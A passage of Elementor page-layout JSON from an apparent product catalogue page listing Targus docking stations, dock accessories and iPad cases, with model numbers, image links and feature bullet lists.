center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul 